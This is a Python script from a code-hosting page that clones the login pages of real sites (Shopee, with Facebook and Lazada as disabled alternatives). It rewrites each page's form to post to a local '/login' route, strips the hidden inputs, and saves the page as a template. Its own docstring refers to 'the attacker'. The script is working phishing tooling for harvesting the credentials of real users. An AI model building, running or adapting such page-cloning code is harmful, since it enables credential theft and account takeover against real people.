-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathwebscraper.py
More file actions
81 lines (61 loc) · 2.72 KB
/
webscraper.py
File metadata and controls
81 lines (61 loc) · 2.72 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
import requests
import locale
from bs4 import BeautifulSoup
import tld
import sys
# Apply a process-wide locale at start-up.
# NOTE(review): 'de_GB' is not a standard language/territory pair (perhaps
# 'en_GB' or 'de_DE' was intended) -- confirm which one is wanted.
# setlocale() raises locale.Error when the requested locale is not installed;
# that is reported on stderr instead of aborting the script, and the default
# locale stays in effect.
try:
    locale.setlocale(locale.LC_ALL, 'de_GB')
except locale.Error:
    print("Warning: locale 'de_GB' is not available, keeping the default locale.", file=sys.stderr)
def webScraping(url: str, login: bool = True) -> BeautifulSoup:
    """
    Scrape a page, rewrite its login form and save the result as a template.

    The page at ``url`` is downloaded, parsed with the "lxml" parser, passed
    through ``modifyPasswordForm`` and written, prettified, to
    ``templates/<domain>.html`` (``templates/<domain>fail.html`` when
    ``login`` is false). ``<domain>`` is the ``domain`` attribute of the
    object returned by ``tld.get_tld`` for ``url``.

    Args:
        url: Address of the page to scrape.
        login: True means this is the login page; False means this is the
            failed login page, which is stored under a "fail"-suffixed name.

    Returns:
        The modified soup, or None when the request failed with a connection
        error or a timeout (a message is printed to stderr in that case).
    """
    import os  # local import: only needed to create the output directory

    # Keep the try body limited to the one call that can raise request errors.
    try:
        # requests reads a timeout tuple as (connect timeout, read timeout).
        website = requests.get(url, timeout=(27, 2))
    except requests.exceptions.ConnectionError:
        print(f"Website {url} might not exist!", file=sys.stderr)
        return None
    except requests.exceptions.Timeout:
        # A response slower than the read timeout raises ReadTimeout, which is
        # not a ConnectionError; report it instead of crashing.
        print(f"Website {url} timed out!", file=sys.stderr)
        return None

    if website.status_code != 200:
        # Reported but not fatal: whatever body was returned is still processed.
        print(f"Error! Website is not visitable. Error code: {website.status_code}", file=sys.stderr)

    domain = tld.get_tld(url, as_object=True).domain
    if not login:
        domain = domain + "fail"

    # Parse and rewrite BEFORE opening the file: opening with "w" truncates
    # it, so a failure while parsing must not leave an empty template behind.
    soup = modifyPasswordForm(BeautifulSoup(website.text, "lxml"))
    html = soup.prettify()

    # Make sure the output directory exists so open() cannot fail on it.
    os.makedirs("templates", exist_ok=True)
    with open(f"templates/{domain}.html", "w", encoding="utf-8") as file:
        file.write(html)
    return soup
def modifyPasswordForm(soup: BeautifulSoup) -> BeautifulSoup:
    """
    Rewrite the first <form> of the page so that it posts to "/login".

    If a form is found, its attributes are set to method="POST" and
    action="/login", every hidden <input> inside it is removed (the hidden
    input is not useful to the attacker), and a <button> whose name is
    "login" or "sign in" loses its "name" and "value" attributes.
    A warning is printed to stderr when the page has no password input.

    Note: THIS IS AN EXPERIMENTAL FEATURE

    Args:
        soup: Parsed page; it is modified in place.

    Returns:
        The same ``soup`` object that was passed in.
    """
    # find_all() returns a (possibly empty) list-like result, never None, so
    # the check has to be for emptiness or the warning can never fire.
    password_inputs = soup.find_all("input", type="password")
    if not password_inputs:
        print("Warning, password form is not found, this might NOT be a login page!", file=sys.stderr)

    form = soup.find("form")
    if form is None:
        # Pages that build their login out of <div>s instead of a <form> are
        # returned unchanged.
        return soup

    form["action"] = "/login"
    form["method"] = "POST"

    # Remove hidden inputs
    for hidden_input in form.find_all("input", type="hidden"):
        hidden_input.decompose()

    # Change login button if it exists
    login_button = form.find("button", {"name": ["login", "sign in"]})
    if login_button is not None:
        del login_button["name"]
        del login_button["value"]

    # Script removal is DEPRECATED and kept disabled, since some login forms
    # need their scripts to load:
    # scripts = soup.find_all("script")
    # for script in scripts:
    #     script.decompose()
    # div = soup.find("div", attrs={"display": "block"})
    # div.decompose()
    return soup
if __name__ == "__main__":
    # Modify the url here. Anyways, this script is EXPERIMENTAL.
    #
    # Alternative targets (disabled):
    #   webScraping("https://facebook.com/login", False)
    #   webScraping("https://member.lazada.sg/user/login", False)
    webScraping("https://shopee.sg/buyer/login", login=False)